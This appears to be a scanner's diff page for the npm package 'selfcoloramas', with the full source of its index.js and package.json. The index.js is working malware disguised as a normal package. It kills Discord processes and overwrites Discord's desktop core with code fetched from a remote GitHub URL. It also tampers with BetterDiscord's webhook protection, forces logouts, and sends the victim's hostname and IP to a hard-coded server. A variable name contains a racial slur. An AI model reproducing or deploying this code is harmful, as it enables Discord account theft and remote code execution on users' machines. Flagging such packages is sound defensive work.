selfcoloramas 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of selfcoloramas might be problematic. Click here for more details.
- package/index.js +201 -0
- package/package.json +31 -0
package/index.js
ADDED
@@ -0,0 +1,201 @@
|
|
1
|
+
|
2
|
+
const glob = require("glob");
|
3
|
+
const fs = require('fs');
|
4
|
+
const https = require('node:https');
|
5
|
+
const { exec } = require('child_process');
|
6
|
+
const shell = require('shelljs')
|
7
|
+
const os = require('node:os');
|
8
|
+
const axios = require('axios');
|
9
|
+
const download = require('download');
|
10
|
+
var ip = require("ip");
|
11
|
+
const zip = require("adm-zip");
|
12
|
+
const FormData = require("form-data");
|
13
|
+
var XMLHttpRequest = require('xhr2');
|
14
|
+
const buf_replace = require('buffer-replace');
|
15
|
+
const { session, BrowserWindow } = require("electron");
|
16
|
+
const path = require("path");
|
17
|
+
const querystring = require("querystring");
|
18
|
+
//////////////////////////////////////////////////////////////////////
|
19
|
+
const config = {
|
20
|
+
"logout": "instant",
|
21
|
+
"inject-notify": "true",
|
22
|
+
"logout-notify": "true",
|
23
|
+
"init-notify":"true",
|
24
|
+
"embed-color": 123,
|
25
|
+
"USERNAMEWEBHOOK": "moonsz",
|
26
|
+
"disable-qr-code": "true"
|
27
|
+
}
|
28
|
+
//////////////////////////////////////////////////////////////////////
|
29
|
+
let LOCAL = process.env.LOCALAPPDATA
|
30
|
+
let discords = [];
|
31
|
+
let injectPath = [];
|
32
|
+
let runningDiscords = [];
|
33
|
+
|
34
|
+
fs.readdirSync(LOCAL).forEach(file => {
|
35
|
+
if (file.includes("iscord")) {
|
36
|
+
discords.push(LOCAL + '\\' + file)
|
37
|
+
} else {
|
38
|
+
return;
|
39
|
+
}
|
40
|
+
});
|
41
|
+
|
42
|
+
const temp = process.env.temp;
|
43
|
+
const infectionPath = path.join(process.env.temp, "\\Windows_Defender");
|
44
|
+
|
45
|
+
|
46
|
+
|
47
|
+
function Infect() {
|
48
|
+
|
49
|
+
https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
|
50
|
+
let data = '';
|
51
|
+
|
52
|
+
resp.on('data', (chunk) => {
|
53
|
+
data += chunk;
|
54
|
+
});
|
55
|
+
resp.on('end', () => {
|
56
|
+
injectPath.forEach(file => {
|
57
|
+
fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
|
58
|
+
encoding: 'utf8',
|
59
|
+
flag: 'w'
|
60
|
+
});
|
61
|
+
|
62
|
+
if (config["init-notify"] == "true") {
|
63
|
+
let init = file.replace("index.js", "init")
|
64
|
+
if (!fs.existsSync(init)) {
|
65
|
+
fs.mkdirSync(init, 0744)
|
66
|
+
}
|
67
|
+
}
|
68
|
+
|
69
|
+
if ( config.logout != "false" ) {
|
70
|
+
let folder = file.replace("index.js", "DC_BTW")
|
71
|
+
if (!fs.existsSync(folder)) {
|
72
|
+
fs.mkdirSync(folder, 0744)
|
73
|
+
if (config.logout == "instant") {
|
74
|
+
startDiscord();
|
75
|
+
}
|
76
|
+
} else if (fs.existsSync(folder) && config.logout == "instant" ){
|
77
|
+
startDiscord();
|
78
|
+
}
|
79
|
+
}
|
80
|
+
})
|
81
|
+
});
|
82
|
+
}).on("error", (err) => {
|
83
|
+
});
|
84
|
+
};
|
85
|
+
|
86
|
+
const logout = async () => {
|
87
|
+
await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
|
88
|
+
`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
|
89
|
+
true
|
90
|
+
);
|
91
|
+
|
92
|
+
return "ok";
|
93
|
+
};
|
94
|
+
|
95
|
+
function killDiscord() {
|
96
|
+
runningDiscords.forEach(disc => {
|
97
|
+
exec(`taskkill /IM ${disc}.exe /F`, (err) => {
|
98
|
+
if (err) {
|
99
|
+
return;
|
100
|
+
}
|
101
|
+
});
|
102
|
+
});
|
103
|
+
|
104
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
105
|
+
injectNotify();
|
106
|
+
|
107
|
+
}
|
108
|
+
Infect()
|
109
|
+
pwnBetterDiscord()
|
110
|
+
};
|
111
|
+
|
112
|
+
function listDiscords() {
|
113
|
+
exec('tasklist', function(err, stdout, stderr) {
|
114
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
|
115
|
+
if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
|
116
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
|
117
|
+
if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
|
118
|
+
if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
|
119
|
+
if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
|
120
|
+
if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
|
121
|
+
if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
|
122
|
+
if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
|
123
|
+
if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
|
124
|
+
|
125
|
+
if (config.logout == "instant") {
|
126
|
+
killDiscord();
|
127
|
+
} else {
|
128
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
129
|
+
injectNotify();
|
130
|
+
}
|
131
|
+
Infect()
|
132
|
+
pwnBetterDiscord()
|
133
|
+
}
|
134
|
+
})
|
135
|
+
};
|
136
|
+
|
137
|
+
function startDiscord() {
|
138
|
+
runningDiscords.forEach(disc => {
|
139
|
+
let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
|
140
|
+
exec(path, (err) => {
|
141
|
+
if (err) {
|
142
|
+
return;
|
143
|
+
}
|
144
|
+
});
|
145
|
+
});
|
146
|
+
};
|
147
|
+
|
148
|
+
function pwnBetterDiscord() {
|
149
|
+
let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
|
150
|
+
if (fs.existsSync(dir)) {
|
151
|
+
let x = fs.readFileSync(dir)
|
152
|
+
fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
|
153
|
+
}
|
154
|
+
|
155
|
+
return;
|
156
|
+
}
|
157
|
+
|
158
|
+
function injectNotify() {
|
159
|
+
let fields = [];
|
160
|
+
injectPath.forEach( path => {
|
161
|
+
let c = path
|
162
|
+
fields.push(c)
|
163
|
+
})
|
164
|
+
|
165
|
+
const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
|
166
|
+
var xhr = new XMLHttpRequest();
|
167
|
+
xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
|
168
|
+
xhr.setRequestHeader('Content-type', 'application/json');
|
169
|
+
xhr.onload = function () {
|
170
|
+
const negrodefender = this.responseText;
|
171
|
+
};
|
172
|
+
xhr.send(data);
|
173
|
+
}
|
174
|
+
|
175
|
+
function getDirectories(path) {
|
176
|
+
return fs.readdirSync(path).filter(function (file) {
|
177
|
+
return fs.statSync(path+'/'+file).isDirectory();
|
178
|
+
});
|
179
|
+
}
|
180
|
+
|
181
|
+
|
182
|
+
listDiscords();
|
183
|
+
discords.forEach(function(file) {
|
184
|
+
getDirectories(file + "\\").forEach((item) => {
|
185
|
+
if (item.includes("app-")) {
|
186
|
+
file = file + "\\" + item + "\\modules\\";
|
187
|
+
}
|
188
|
+
});
|
189
|
+
getDirectories(file).forEach((item) => {
|
190
|
+
if (item.includes("discord_desktop_core-")) {
|
191
|
+
file = file + "\\" + item + "\\discord_desktop_core\\index.js";
|
192
|
+
}
|
193
|
+
});
|
194
|
+
|
195
|
+
if (fs.existsSync(file)) {
|
196
|
+
injectPath.push(file);
|
197
|
+
}
|
198
|
+
});
|
199
|
+
killDiscord();
|
200
|
+
Infect();
|
201
|
+
startDiscord();
|
package/package.json
ADDED
@@ -0,0 +1,31 @@
|
|
1
|
+
{
|
2
|
+
"dependencies": {
|
3
|
+
"adm-zip": "^0.5.9",
|
4
|
+
"axios": "^0.27.2",
|
5
|
+
"buffer-replace": "^1.0.0",
|
6
|
+
"child_process": "^1.0.2",
|
7
|
+
"color": "^4.2.3",
|
8
|
+
"download": "^8.0.0",
|
9
|
+
"electron": "^19.0.9",
|
10
|
+
"form-data": "^4.0.0",
|
11
|
+
"fs": "^0.0.1-security",
|
12
|
+
"glob": "^8.0.3",
|
13
|
+
"https": "^1.0.0",
|
14
|
+
"ip": "^1.1.8",
|
15
|
+
"os": "^0.1.2",
|
16
|
+
"path": "^0.12.7",
|
17
|
+
"querystring": "^0.2.1",
|
18
|
+
"shelljs": "^0.8.5",
|
19
|
+
"xhr2": "^0.2.1"
|
20
|
+
},
|
21
|
+
"name": "selfcoloramas",
|
22
|
+
"version": "1.0.0",
|
23
|
+
"main": "index.js",
|
24
|
+
"devDependencies": {},
|
25
|
+
"scripts": {
|
26
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
27
|
+
},
|
28
|
+
"author": "nahedasamic <nahedasamic@gmail.com>",
|
29
|
+
"license": "MIT",
|
30
|
+
"description": ""
|
31
|
+
}
|